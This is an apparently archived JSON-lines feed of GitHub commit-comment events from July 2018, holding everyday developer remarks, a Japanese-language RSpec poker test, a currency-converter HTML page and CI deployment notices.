{"id":"7903346069","type":"CommitCommentEvent","actor":{"login":"candirufish"},"repo":{"name":"noobpwnftw/Stockfish"},"payload":{"comment":{"id":29558733,"position":null,"line":null,"path":null,"commit_id":"5d5bc8eb02f4b372c0ed163afb3bc253b082568d","created_at":"2018-07-01T17:03:52Z","updated_at":"2018-07-01T17:03:52Z","author_association":"NONE","body":"Hope you complete the series of measuring elo scalability that you started with 32c vs 384. Also interested in 128c vs 384 and 256c vs 384. And probably 1 vs 384, so we have an idea on how strong stockfish 18 will be LoL."}},"created_at":"2018-07-01T17:03:52Z"}
{"id":"7903346811","type":"CommitCommentEvent","actor":{"login":"Marvel34"},"repo":{"name":"TelegramMessenger/MTProxy"},"payload":{"comment":{"id":29558737,"position":31,"line":31,"path":"Makefile","commit_id":"cc7b7097a5bc1681d0f4c05d5f07576c8b279fc4","created_at":"2018-07-01T17:04:26Z","updated_at":"2018-07-01T17:04:26Z","author_association":"NONE","body":"100%"}},"created_at":"2018-07-01T17:04:26Z"}
{"id":"7903346824","type":"CommitCommentEvent","actor":{"login":"Randium"},"repo":{"name":"werewolves-devs/Werewolf_Bot"},"payload":{"comment":{"id":29558738,"position":null,"line":null,"path":null,"commit_id":"da345edbac121e87af51504232d3fe958b10c98b","created_at":"2018-07-01T17:04:27Z","updated_at":"2018-07-01T17:04:27Z","author_association":"COLLABORATOR","body":"I just noticed this file. What is its purpose? What is it used for?"}},"created_at":"2018-07-01T17:04:27Z"}
{"id":"7903347603","type":"CommitCommentEvent","actor":{"login":"Bentechy66"},"repo":{"name":"werewolves-devs/Werewolf_Bot"},"payload":{"comment":{"id":29558740,"position":null,"line":null,"path":null,"commit_id":"da345edbac121e87af51504232d3fe958b10c98b","created_at":"2018-07-01T17:05:04Z","updated_at":"2018-07-01T17:05:04Z","author_association":"CONTRIBUTOR","body":"If you're using desktop git, it will ignore these files when you do `git add .` or `git add *`"}},"created_at":"2018-07-01T17:05:04Z"}
{"id":"7903347787","type":"CommitCommentEvent","actor":{"login":"yumayo14"},"repo":{"name":"yumayo14/porker_game"},"payload":{"comment":{"id":29558742,"position":null,"line":null,"path":null,"commit_id":"bbad7e8f9f4a39c59db0b1cdc519f1ae03dcab6e","created_at":"2018-07-01T17:05:13Z","updated_at":"2018-07-01T17:05:13Z","author_association":"OWNER","body":"require 'rspec'\r\nrequire_relative '../src/porker_hand'\r\nrequire_relative '../src/card'\r\nrequire_relative '../src/hand'\r\n\r\ndescribe \"Hand\" do\r\n  describe \"役同士の強さの比較\" do\r\n    it \"ストレートフラッシュはペアより強い\" do\r\n      expect(HandCombination::StraightFlash[:score] > HandCombination::Pair[:score]).to eq true\r\n    end\r\n    it \"ペアはストレートより強い\" do\r\n      expect(HandCombination::Pair[:score] > HandCombination::Straight[:score]).to eq true\r\n    end\r\n    it \"ストレートはフラッシュより強い\" do\r\n      expect(HandCombination::Straight[:score] > HandCombination::Flash[:score]).to eq true\r\n    end\r\n    it \"フラッシュはハイカードより強い\" do\r\n      expect(HandCombination::Flash[:score] > HandCombination::HighCard[:score]).to eq true\r\n    end\r\n  end\r\n  describe \"2つの手札の役の強さを比較\" do\r\n    context \"first_handの方が強い場合\" do\r\n      first_hand = Hand.new(Card.new(\"♤\", RankPicture::A), Card.new(\"♧\", RankPicture::A))\r\n      first_hand.role = first_hand.cards[0].check_hand_card(first_hand.cards[1])\r\n      second_hand = Hand.new(Card.new(\"♤\", 7), Card.new(\"♧\", 4))\r\n      second_hand.role = second_hand.cards[0].check_hand_card(second_hand.cards[1])\r\n      it \"first_handの@winningにGameResult::Winが返り、second_handの@winningにGameResult::Loseが返る\" do\r\n        result = first_hand.judge_result(second_hand)\r\n        expect(first_hand.winning).to eq GameResult::Win\r\n        expect(second_hand.winning).to eq GameResult::Lose\r\n      end\r\n    end\r\n    context \"second_handの方が強い場合\" do\r\n      first_hand = Hand.new(Card.new(\"♤\", 4), Card.new(\"♧\", 5))\r\n      first_hand.role = first_hand.cards[0].check_hand_card(first_hand.cards[1])\r\n      second_hand = Hand.new(Card.new(\"♤\", RankPicture::A), Card.new(\"♧\", RankPicture::A))\r\n      second_hand.role = second_hand.cards[0].check_hand_card(second_hand.cards[1])\r\n      it \"first_handの@winningにGameResult::Winが返り、second_handの@winningにGameResult::Wingが返る\" do\r\n        result = first_hand.judge_result(second_hand)\r\n        expect(first_hand.winning).to eq GameResult::Lose\r\n        expect(second_hand.winning).to eq GameResult::Win\r\n      end\r\n    end\r\n    context \"同じ役の場合\" do\r\n      first_hand = Hand.new(Card.new(\"♤\", 5), Card.new(\"♧\", 5))\r\n      first_hand.role = first_hand.cards[0].check_hand_card(first_hand.cards[1])\r\n      second_hand = Hand.new(Card.new(\"♡\", 4), Card.new(\"♢\", 4))\r\n      second_hand.role = second_hand.cards[0].check_hand_card(second_hand.cards[1])\r\n      it \"両方の@winningにGameResult::Drawが返る\" do\r\n        result = first_hand.judge_result(second_hand)\r\n        expect(first_hand.winning).to eq GameResult::Draw\r\n        expect(second_hand.winning).to eq GameResult::Draw\r\n      end\r\n    end\r\n    context \"同じ役同士でも、手札のランクが異なる場合\" do\r\n      context \"ストレートフラッシュの場合\" do\r\n        it \"K-Aの組み合わせがもっとも強い\" do\r\n        end\r\n        it \"A-2の組み合わせがもっとも弱い\" do\r\n        end\r\n        it \"手札のランクが2枚とも同じ場合は、引き分け\" do\r\n        end\r\n      end\r\n      context \"ペアの場合\" do\r\n        it \"Aのペアがもっとも強い\" do\r\n          result = first_hand.judge_result(second_hand)\r\n          if econd_hand.role[:score] == @role[:score]\r\n            card_score_judge\r\n            #カードの数値をハッシュで管理したもの{maxとmin}\r\n          end\r\n\r\n        end\r\n        it \"手札のランクが（2枚）とも同じ場合は引き分け\" do\r\n        end\r\n      end\r\n      context \"フラッシュの場合\" do\r\n        it \"ランクが高い手札同士を比較する\" do\r\n        end\r\n        it \"お互いのランクが高い方の手札のランクが同じだった場合、もう一つの手札を比較する\" do\r\n        end\r\n        it \"手札のランクが2枚とも同じ場合は、引き分け\" do\r\n        end\r\n      end\r\n      context \"ハイカードの場合\" do\r\n        it \"ランクが高い手札同士を比較する\" do\r\n        end\r\n        it \"お互いのランクが高い方の手札のランクが同じだった場合、もう一つの手札を比較する\" do\r\n        end\r\n        it \"手札のランクが2枚とも同じ場合は、引き分け\" do\r\n        end\r\n      end\r\n    end\r\n  end\r\nend\r\n"}},"created_at":"2018-07-01T17:05:13Z"}
{"id":"7903348136","type":"CommitCommentEvent","actor":{"login":"laborleben"},"repo":{"name":"SiLab-Bonn/pytlu"},"payload":{"comment":{"id":29558743,"position":null,"line":null,"path":null,"commit_id":"8a70aca56f6821f78c62bd312223004e00e508cd","created_at":"2018-07-01T17:05:30Z","updated_at":"2018-07-01T17:05:30Z","author_association":"MEMBER","body":"The online monitor is dowloaded and installed locally with ```setup_requires=['online_monitor==0.3.1']```. Now, the online monitor is mentioned also under ```install_requires=...```, which also installs it on the system. The system wide installation was not the case before the change."}},"created_at":"2018-07-01T17:05:30Z"}
{"id":"7903348952","type":"CommitCommentEvent","actor":{"login":"Jamiuaishat"},"repo":{"name":"Jamiuaishat/pixel-art-maker"},"payload":{"comment":{"id":29558744,"position":null,"line":null,"path":null,"commit_id":"af3dfc8cf612a43bcf158a629f5cc4ba6d3766f5","created_at":"2018-07-01T17:06:09Z","updated_at":"2018-07-01T17:06:09Z","author_association":"OWNER","body":"JavaScript file"}},"created_at":"2018-07-01T17:06:09Z"}
{"id":"7903351496","type":"CommitCommentEvent","actor":{"login":"lokijota"},"repo":{"name":"lokijota/PeopleAssignment"},"payload":{"comment":{"id":29558748,"position":null,"line":null,"path":null,"commit_id":"1144dc460c8244f5c5fdb8c4c59d4082c6f90a2c","created_at":"2018-07-01T17:08:00Z","updated_at":"2018-07-01T17:08:00Z","author_association":"OWNER","body":"Source of map is OpenStreetMap."}},"created_at":"2018-07-01T17:08:00Z"}
{"id":"7903351998","type":"CommitCommentEvent","actor":{"login":"Marvel34"},"repo":{"name":"TelegramMessenger/MTProxy"},"payload":{"comment":{"id":29558750,"position":35,"line":35,"path":"common/crc32.c","commit_id":"cc7b7097a5bc1681d0f4c05d5f07576c8b279fc4","created_at":"2018-07-01T17:08:22Z","updated_at":"2018-07-01T17:08:22Z","author_association":"NONE","body":"023245210xx"}},"created_at":"2018-07-01T17:08:22Z"}
{"id":"7903352472","type":"CommitCommentEvent","actor":{"login":"isuruf"},"repo":{"name":"conda-forge/smart_open-feedstock"},"payload":{"comment":{"id":29558752,"position":null,"line":null,"path":null,"commit_id":"a370bf8be77b49b980a1c363d0a182c52e6c70f3","created_at":"2018-07-01T17:08:45Z","updated_at":"2018-07-01T17:08:45Z","author_association":"MEMBER","body":"> What's a problem with commit/push directly to conda-forge/smart_open-feedstock, why PR from fork better?\r\n\r\nBecause in a PR, the changes are tested before merging. When directly pushed, some CI jobs might fail and some might pass (say Linux passed and OSX failed). Even the Linux ones might have had some issues. When the issues are fixed, OSX builds will be uploaded, but Linux will be from the previous build. This leaves the package in a messy state."}},"created_at":"2018-07-01T17:08:45Z"}
{"id":"7903353302","type":"CommitCommentEvent","actor":{"login":"Marvel34"},"repo":{"name":"TelegramMessenger/MTProxy"},"payload":{"comment":{"id":29558753,"position":5,"line":5,"path":"Makefile","commit_id":"cc7b7097a5bc1681d0f4c05d5f07576c8b279fc4","created_at":"2018-07-01T17:09:18Z","updated_at":"2018-07-01T17:09:18Z","author_association":"NONE","body":"9000"}},"created_at":"2018-07-01T17:09:18Z"}
{"id":"7903354685","type":"CommitCommentEvent","actor":{"login":"McAfeeAdminInstance2"},"repo":{"name":"McAfeeInst2Org1/newrepo"},"payload":{"comment":{"id":29558755,"position":1,"line":null,"path":"1530465019.61/github_test.txt","commit_id":"3823a8fc1f7e46df46be6e38515a50398769d08d","created_at":"2018-07-01T17:10:21Z","updated_at":"2018-07-01T17:10:21Z","author_association":"CONTRIBUTOR","body":"889976543"}},"created_at":"2018-07-01T17:10:21Z"}
{"id":"7903354802","type":"CommitCommentEvent","actor":{"login":"jstokes"},"repo":{"name":"amperity/greenlight"},"payload":{"comment":{"id":29558756,"position":46,"line":66,"path":"README.md","commit_id":"3c23fbbe5cf6ff4c499c10defadc0237fac93f28","created_at":"2018-07-01T17:10:27Z","updated_at":"2018-07-01T17:10:27Z","author_association":"MEMBER","body":"Because they are `java.time.Instant` instead of `java.util.Date`? "}},"created_at":"2018-07-01T17:10:27Z"}
{"id":"7903356768","type":"CommitCommentEvent","actor":{"login":"chaiwa-berian"},"repo":{"name":"chaiwa-berian/JournalApp"},"payload":{"comment":{"id":29558757,"position":null,"line":null,"path":null,"commit_id":"9c09fb59e38d7ac5783499514ce94919e45236a8","created_at":"2018-07-01T17:12:03Z","updated_at":"2018-07-01T17:12:03Z","author_association":"OWNER","body":"Fixed #1 "}},"created_at":"2018-07-01T17:12:03Z"}
{"id":"7903358744","type":"CommitCommentEvent","actor":{"login":"maxice8"},"repo":{"name":"jarun/pdd"},"payload":{"comment":{"id":29558763,"position":null,"line":null,"path":null,"commit_id":"2344deb7e5b465fddb2df054a9078119a59bd70d","created_at":"2018-07-01T17:13:29Z","updated_at":"2018-07-01T17:13:29Z","author_association":"CONTRIBUTOR","body":"On Sun, Jul 01, 2018 at 10:01:21AM -0700, Arun Prakash Jana wrote:\n> @szlin @eclipseo @maxice8 @dmarcoux @imntreal pdd v1.3 is released! Please update your respective channels.\n> \n> -- \n> You are receiving this because you were mentioned.\n> Reply to this email directly or view it on GitHub:\n> https://github.com/jarun/pdd/commit/2344deb7e5b465fddb2df054a9078119a59bd70d#commitcomment-29558724\n\nUpdated on Void Linux.\n"}},"created_at":"2018-07-01T17:13:29Z"}
{"id":"7903361535","type":"CommitCommentEvent","actor":{"login":"prophetss"},"repo":{"name":"prophetss/C-log"},"payload":{"comment":{"id":29558771,"position":null,"line":null,"path":null,"commit_id":"657737abe723ffabc986898a2999bd86238f6441","created_at":"2018-07-01T17:15:25Z","updated_at":"2018-07-01T17:15:25Z","author_association":"OWNER","body":"v"}},"created_at":"2018-07-01T17:15:25Z"}
{"id":"7903362136","type":"CommitCommentEvent","actor":{"login":"nirvio"},"repo":{"name":"nirvio/avengers"},"payload":{"comment":{"id":29558773,"position":null,"line":null,"path":null,"commit_id":"4c728ecfefc17dd181bfefc5fcb81ebaae6bbcbb","created_at":"2018-07-01T17:15:48Z","updated_at":"2018-07-01T17:15:48Z","author_association":"OWNER","body":"Aqui creamos la mision de Red Skull #8 "}},"created_at":"2018-07-01T17:15:48Z"}
{"id":"7903362260","type":"CommitCommentEvent","actor":{"login":"karl577"},"repo":{"name":"karl577/577.design"},"payload":{"comment":{"id":29558774,"position":null,"line":null,"path":null,"commit_id":"ae5aafb0e321c088fe0ecd8368abaec36de05a7d","created_at":"2018-07-01T17:15:53Z","updated_at":"2018-07-01T17:15:53Z","author_association":"OWNER","body":"cx"}},"created_at":"2018-07-01T17:15:53Z"}
{"id":"7903364195","type":"CommitCommentEvent","actor":{"login":"whyang0808"},"repo":{"name":"whyang0808/learning-react"},"payload":{"comment":{"id":29558776,"position":null,"line":null,"path":null,"commit_id":"bf5d419877b3b66b2c136e0d39abb4e60e13e6e8","created_at":"2018-07-01T17:17:14Z","updated_at":"2018-07-01T17:17:14Z","author_association":"OWNER","body":"Important hightlight, stateful component can get its props by using `this.props.XYZ`"}},"created_at":"2018-07-01T17:17:14Z"}
{"id":"7903364224","type":"CommitCommentEvent","actor":{"login":"chaiwa-berian"},"repo":{"name":"chaiwa-berian/JournalApp"},"payload":{"comment":{"id":29558777,"position":null,"line":null,"path":null,"commit_id":"7624b787a09e3449f7d808f6a09e7ba930bc9281","created_at":"2018-07-01T17:17:15Z","updated_at":"2018-07-01T17:17:15Z","author_association":"OWNER","body":"Fixed #2 although the continuous integration is yet to happen! :)"}},"created_at":"2018-07-01T17:17:15Z"}
{"id":"7903364260","type":"CommitCommentEvent","actor":{"login":"digitalshopping"},"repo":{"name":"rstormsf/multisender"},"payload":{"comment":{"id":29558778,"position":null,"line":null,"path":null,"commit_id":"7f371b15cac37d3da87fe07568be39353c539463","created_at":"2018-07-01T17:17:17Z","updated_at":"2018-07-01T17:17:17Z","author_association":"NONE","body":"Hello,\r\n\r\nRemarkable Dapp in Rstorm multi sender. I found it to be the simplest solution for multi distribution of tokens. However I don’t understand the pricing and I really need to distribute some tokens to 5000 addresses. I require your assistance in this please. I would appreciate your help in a script or smartcontract code for multisending or your economical aid via rstorm please. \r\n\r\nThank you."}},"created_at":"2018-07-01T17:17:17Z"}
{"id":"7903364562","type":"CommitCommentEvent","actor":{"login":"jims10d"},"repo":{"name":"jims10d/sportman-loopback"},"payload":{"comment":{"id":29558779,"position":null,"line":null,"path":null,"commit_id":"c6611ca59507162cc811856652cac2f336ac7784","created_at":"2018-07-01T17:17:29Z","updated_at":"2018-07-01T17:17:29Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/5a7e57bc-5410-437d-95a5-d427815f5ebc?env_id=ibm%3Ayp%3Aus-south \"sportman-loopback\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/db4be768-68e6-447f-9187-7d1ee9f620cc?env_id=ibm%3Ayp%3Aus-south \"sportman-loopback\") deployed [sportman-loopback](https://github.com/jims10d/sportman-loopback/releases/tag/deploy-ibm-yp-us-south-jims10d-simpleSpace-20180701-171728 \"deploy-ibm-yp-us-south-jims10d-simpleSpace-20180701-171728\") to [simpleSpace](https://console.bluemix.net/apps/12384bdb-7ac1-45d2-b63b-7d0a3532c568?env_id=ibm:yp:us-south \"ibm:yp:us-south:jims10d:simpleSpace\"), including this commit"}},"created_at":"2018-07-01T17:17:29Z"}
{"id":"7903366917","type":"CommitCommentEvent","actor":{"login":"Hitsounds"},"repo":{"name":"Hitsounds/SalienCheat"},"payload":{"comment":{"id":29558780,"position":null,"line":null,"path":null,"commit_id":"d4b260230428a63c411999d8bb785794b7ec5170","created_at":"2018-07-01T17:19:02Z","updated_at":"2018-07-01T17:19:02Z","author_association":"OWNER","body":"I'm sorry D;"}},"created_at":"2018-07-01T17:19:02Z"}
{"id":"7903369485","type":"CommitCommentEvent","actor":{"login":"heartfeltloser"},"repo":{"name":"heartfeltloser/owo-whats-this"},"payload":{"comment":{"id":29558787,"position":null,"line":null,"path":null,"commit_id":"0311a42a2afb34e6617a0ec8b21c6461bdec009a","created_at":"2018-07-01T17:20:59Z","updated_at":"2018-07-01T17:20:59Z","author_association":"OWNER","body":"help"}},"created_at":"2018-07-01T17:20:59Z"}
{"id":"7903379452","type":"CommitCommentEvent","actor":{"login":"andreicristianpetcu"},"repo":{"name":"petre2dor/Search-and-Switch-Containers"},"payload":{"comment":{"id":29558801,"position":51,"line":41,"path":"background.js","commit_id":"08c79d849b14820445cbb1c555df6527b027b595","created_at":"2018-07-01T17:28:31Z","updated_at":"2018-07-01T17:28:31Z","author_association":"NONE","body":"maybe just generate a new name for the container like Temp 1, Temp 2...."}},"created_at":"2018-07-01T17:28:31Z"}
{"id":"7903381833","type":"CommitCommentEvent","actor":{"login":"Aris-t2"},"repo":{"name":"Aris-t2/CustomCSSforFx"},"payload":{"comment":{"id":29558803,"position":null,"line":null,"path":null,"commit_id":"6086c3be3933840f39fc44a25b67d0a0f1e04ce1","created_at":"2018-07-01T17:30:15Z","updated_at":"2018-07-01T17:30:15Z","author_association":"OWNER","body":"Firefox 60+ does not support [unread] tab status anymore. Since this project moved the code to Fx60+ and dropped support for Fx57-59 all references and options containing [unread] became obsolete."}},"created_at":"2018-07-01T17:30:15Z"}
{"id":"7903383151","type":"CommitCommentEvent","actor":{"login":"ronaldbrito"},"repo":{"name":"ronaldbrito/hello_world"},"payload":{"comment":{"id":29558808,"position":null,"line":null,"path":null,"commit_id":"9c1f367f5e2719a5cb2012d1fbe1e2a9f18d78cd","created_at":"2018-07-01T17:31:10Z","updated_at":"2018-07-01T17:31:10Z","author_association":"OWNER","body":"vamos começar hoje\r\n"}},"created_at":"2018-07-01T17:31:10Z"}
{"id":"7903383368","type":"CommitCommentEvent","actor":{"login":"AndreyKirichenko"},"repo":{"name":"AndreyKirichenko/ror_beginner"},"payload":{"comment":{"id":29558809,"position":2,"line":2,"path":"lesson_4/cargo_wagon.rb","commit_id":"d21bd1f2c9a9b1494930ef1a3688eed65fa20775","created_at":"2018-07-01T17:31:21Z","updated_at":"2018-07-01T17:31:21Z","author_association":"OWNER","body":"Я это сделал чтобы хоть чем-то наполнить класс"}},"created_at":"2018-07-01T17:31:21Z"}
{"id":"7903383439","type":"CommitCommentEvent","actor":{"login":"ayushsuhane"},"repo":{"name":"seb-buch/mdanalysis"},"payload":{"comment":{"id":29558810,"position":null,"line":null,"path":null,"commit_id":"919bdbaf2a9d9639496da4b3606429fa2942b688","created_at":"2018-07-01T17:31:24Z","updated_at":"2018-07-01T17:31:24Z","author_association":"NONE","body":"Hi Seb, \r\nI was wondering if we go for abort() here, then the memory allocated till here is also lost, right? What could be a good way to deal with it?\r\n[https://github.com/seb-buch/mdanalysis/commit/919bdbaf2a9d9639496da4b3606429fa2942b688#diff-bff4d08482de32360b2c33d16e6091c5R422](https://github.com/seb-buch/mdanalysis/commit/919bdbaf2a9d9639496da4b3606429fa2942b688#diff-bff4d08482de32360b2c33d16e6091c5R422) "}},"created_at":"2018-07-01T17:31:24Z"}
{"id":"7903383645","type":"CommitCommentEvent","actor":{"login":"zhongfc"},"repo":{"name":"zhongfc/swot"},"payload":{"comment":{"id":29558811,"position":null,"line":null,"path":null,"commit_id":"e680992355b2b22bbe6f07f1a1d0aa1776134599","created_at":"2018-07-01T17:31:33Z","updated_at":"2018-07-01T17:31:33Z","author_association":"OWNER","body":"add Southwest Petroleum University"}},"created_at":"2018-07-01T17:31:33Z"}
{"id":"7903383836","type":"CommitCommentEvent","actor":{"login":"mehulshahnj"},"repo":{"name":"mehulshahnj/gc-blockchain-app"},"payload":{"comment":{"id":29558812,"position":null,"line":null,"path":null,"commit_id":"285470764e2b67185f92db2993a7cc24c9da4eef","created_at":"2018-07-01T17:31:42Z","updated_at":"2018-07-01T17:31:42Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/3955c280-8a6e-4ed0-b7a5-6f30f95f589d?env_id=ibm%3Ayp%3Aus-south \"gc-blockchain-app\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/90d723e9-1ac3-490d-b08c-83526e6ac856?env_id=ibm%3Ayp%3Aus-south \"gc-blockchain-app\") deployed [gc-blockchain-app](https://github.com/mehulshahnj/gc-blockchain-app/releases/tag/deploy-ibm-yp-us-south-mehul-infinity-services.com-dev-20180701-173141 \"deploy-ibm-yp-us-south-mehul-infinity-services.com-dev-20180701-173141\") to [dev](https://console.bluemix.net/apps/66924478-3b02-45f8-9e16-708e8fe8c507?env_id=ibm:yp:us-south \"ibm:yp:us-south:mehul@infinity-services.com:dev\"), including this commit"}},"created_at":"2018-07-01T17:31:42Z"}
{"id":"7903385758","type":"CommitCommentEvent","actor":{"login":"Nahue96"},"repo":{"name":"bigbluebutton/bbb-install"},"payload":{"comment":{"id":29558813,"position":null,"line":null,"path":null,"commit_id":"1e95d7fdd250b6b0e836672cefa9dd4ec8c2f511","created_at":"2018-07-01T17:33:04Z","updated_at":"2018-07-01T17:33:04Z","author_association":"NONE","body":"Perfect!. To update my bbb I have to execute again de script? I installed it 2 month ago."}},"created_at":"2018-07-01T17:33:04Z"}
{"id":"7903386673","type":"CommitCommentEvent","actor":{"login":"mquinson"},"repo":{"name":"mquinson/po4a"},"payload":{"comment":{"id":29558815,"position":5,"line":183,"path":"CONTRIBUTING.md","commit_id":"df79e8c6c2088b6528f0082a1ede4adf58de10cb","created_at":"2018-07-01T17:33:44Z","updated_at":"2018-07-01T17:33:44Z","author_association":"OWNER","body":"In some sense. I wanted to click on the link from the terminal and thought that the extra space will make no difference in the other settings. Will it ?"}},"created_at":"2018-07-01T17:33:44Z"}
{"id":"7903390132","type":"CommitCommentEvent","actor":{"login":"szymczdm"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29558819,"position":null,"line":null,"path":null,"commit_id":"af0d6956580ac7bd63fb18343fb38f51e3da4e93","created_at":"2018-07-01T17:36:17Z","updated_at":"2018-07-01T17:36:17Z","author_association":"COLLABORATOR","body":"I'm assuming removing them had no effect on the output? If so, yup, that is exactly the kind of thing we'll be removing."}},"created_at":"2018-07-01T17:36:17Z"}
{"id":"7903390543","type":"CommitCommentEvent","actor":{"login":"wkitty42"},"repo":{"name":"c172p-team/c172p"},"payload":{"comment":{"id":29558820,"position":null,"line":null,"path":null,"commit_id":"3ae6a0940f6a98a48b828f77d96de939f5ddaf84","created_at":"2018-07-01T17:36:35Z","updated_at":"2018-07-01T17:36:35Z","author_association":"CONTRIBUTOR","body":"On 07/01/2018 12:32 PM, wkitty42@gmail.com wrote:\n> On 07/01/2018 11:20 AM, Joshua Davidson wrote:\n>> Yes, that was an example picture. I've never seen an attitude indicator \n>> matching the one we have in FG anywhere on the internet (I've searched long\n>>  and hard). >\n> i don't know where it came from but the attitude indicator we're using looks\n> to be a 3D model... at least it has an .ac file... the \"\"problem\"\" seems to\n> come from the texture file for it...\n\nso, i've done this...\n\nhttps://www.dropbox.com/s/0bp5zs8dr39vtia/20180701-c172p-attitude-indicator-reworked-colors-01.jpg?dl=0\n\n\nhttps://www.dropbox.com/s/zkfhl49nnbrnazu/20180701-c172p-attitude-indicator-reworked-colors-02.jpg?dl=0\n\n\ni can make a PR for this texture if folks want me to... or i can get it to \ngiliberto and let him clean it up a little bit? i used gimp and got pretty lucky \ndoing the circle selection for the blue outer ring so i could flood fill it... \nthere's still some anti-aliasing in it but this looks like a good start for an \nhour's work...\n"}},"created_at":"2018-07-01T17:36:35Z"}
{"id":"7903391160","type":"CommitCommentEvent","actor":{"login":"kdrag0n"},"repo":{"name":"kdrag0n/velocity_tissot"},"payload":{"comment":{"id":29558821,"position":null,"line":null,"path":null,"commit_id":"257b6ebb2d4e45ec6c90df574ef2b2db493ee4be","created_at":"2018-07-01T17:37:00Z","updated_at":"2018-07-01T17:37:00Z","author_association":"OWNER","body":"Not sure about this one, he did it while I was away. It was his original\ncode though.\n\nOn Sun, Jul 1, 2018, 4:59 AM khusika <notifications@github.com> wrote:\n\n> Just a suggestion to cherry-pick the original one then modify with your\n> own changes instead of kang it. Original codes here by @franciscofranco\n> <https://github.com/franciscofranco> franciscofranco/enchilada@42941ae\n> <https://github.com/franciscofranco/enchilada/commit/42941ae6c4d1d57664a29d8429b3bee34f1eca20>\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/kdrag0n/velocity_tissot/commit/257b6ebb2d4e45ec6c90df574ef2b2db493ee4be#commitcomment-29557732>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AHkBf7q9xM6lg41Wt58VJTyS8UfU391Qks5uCLmrgaJpZM4U-TKh>\n> .\n>\n"}},"created_at":"2018-07-01T17:37:00Z"}
{"id":"7903392008","type":"CommitCommentEvent","actor":{"login":"buddhi1980"},"repo":{"name":"buddhi1980/mandelbulber2"},"payload":{"comment":{"id":29558823,"position":null,"line":null,"path":null,"commit_id":"94b0577a32a4c00b777ce116adae565cf30d2f76","created_at":"2018-07-01T17:37:40Z","updated_at":"2018-07-01T17:37:40Z","author_association":"OWNER","body":"It is very good idea. This class can be used for many purposes. "}},"created_at":"2018-07-01T17:37:40Z"}
{"id":"7903392694","type":"CommitCommentEvent","actor":{"login":"DanielMaritim"},"repo":{"name":"DanielMaritim/DanielMaritim.github.io"},"payload":{"comment":{"id":29558824,"position":null,"line":null,"path":null,"commit_id":"ebf7e2cad998fa49b77de105a1424616d34470aa","created_at":"2018-07-01T17:38:10Z","updated_at":"2018-07-01T17:38:10Z","author_association":"OWNER","body":"<!DOCTYPE html>\r\n<html lang=\"en\">\r\n\r\n<head>\r\n    <meta charset=\"UTF-8\">\r\n    <meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\">\r\n    <meta http-equiv=\"X-UA-Compatible\" content=\"ie=edge\">\r\n    <link rel=\"stylesheet\" href=\"\">\r\n    <link rel=\"stylesheet\" href=\"css/main.css\">\r\n    <link rel=\"stylesheet\" href=\"https://stackpath.bootstrapcdn.com/bootstrap/4.1.1/css/bootstrap.min.css\" integrity=\"sha384-WskhaSGFgHYWDcbwN70/dfYBj47jz9qbsMId/iRN3ewGhXQFZCSftd1LZCfmhktB\"\r\n        crossorigin=\"anonymous\">\r\n    <title>CURRENCY CONVERTOR</title>\r\n</head>\r\n\r\n<body>\r\n\r\n    <div class=\"container card mx-6-auto\">\r\n\r\n        <h4 class=\"heading text-center\">CURRENCY CONVERTOR</h4>\r\n        <h6 class=\"text-center\">RELAX!PLEASE CONVERT...!</h6>\r\n\r\n        <form class=\"card-body form-group \" id=\"frm1\">\r\n            <label class=\"\" for=\"list1\">\r\n                <strong>From Currency:</strong>\r\n            </label>\r\n            <select class=\"form-control\" id=\"list1\" type=\"text\" name=\"from\"></select>\r\n            <br>\r\n            <label class=\"\" for=\"list2\">\r\n                <strong>To Currency: </strong>\r\n            </label>\r\n            <select class=\"form-control\" id=\"list2\" type=\"text\" name=\"to\"></select>\r\n            <br>\r\n            <label class=\"\" for=\"amount\">\r\n                <strong>Amount:</strong>\r\n            </label>\r\n            <input class=\"form-control\" for=\"amount\" type=\"text\" name=\"amount\">\r\n            <br>\r\n            <button class=\"form-control btn btn-success\">CONVERT</button>\r\n        </form>\r\n\r\n        <div class=\"result lead\">\r\n            <p id=\"result\"></p>\r\n            <p id=\"db\"></p>\r\n        </div>\r\n\r\n    </div>\r\n\r\n    <script src=\"js/popper.min.js\"></script>\r\n    <script src=\"js/jquery.min.js\"></script>\r\n    <script src=\"js/bootstrap.min.js\"></script>\r\n    <script src=\"C:\\Users\\d\\Desktop\\convertor\\main.js\"></script>\r\n</body>\r\n\r\n</html>"}},"created_at":"2018-07-01T17:38:10Z"}
{"id":"7903393090","type":"CommitCommentEvent","actor":{"login":"vecchiotom"},"repo":{"name":"citizenfx/fivem"},"payload":{"comment":{"id":29558825,"position":null,"line":null,"path":null,"commit_id":"55d9b6789ed93a81f3ca80c67b7a2ff5923a112d","created_at":"2018-07-01T17:38:27Z","updated_at":"2018-07-01T17:38:27Z","author_association":"NONE","body":"xd"}},"created_at":"2018-07-01T17:38:27Z"}
{"id":"7903393866","type":"CommitCommentEvent","actor":{"login":"pongo1231"},"repo":{"name":"citizenfx/fivem"},"payload":{"comment":{"id":29558826,"position":null,"line":null,"path":null,"commit_id":"55d9b6789ed93a81f3ca80c67b7a2ff5923a112d","created_at":"2018-07-01T17:38:59Z","updated_at":"2018-07-01T17:38:59Z","author_association":"CONTRIBUTOR","body":"nice contribution"}},"created_at":"2018-07-01T17:38:59Z"}
{"id":"7903393906","type":"CommitCommentEvent","actor":{"login":"DanielMaritim"},"repo":{"name":"DanielMaritim/DanielMaritim.github.io"},"payload":{"comment":{"id":29558827,"position":null,"line":null,"path":null,"commit_id":"ebf7e2cad998fa49b77de105a1424616d34470aa","created_at":"2018-07-01T17:39:01Z","updated_at":"2018-07-01T17:39:01Z","author_association":"OWNER","body":"this above code runs well on my local machine.i have left it here so that anyone can try and make amendments"}},"created_at":"2018-07-01T17:39:01Z"}
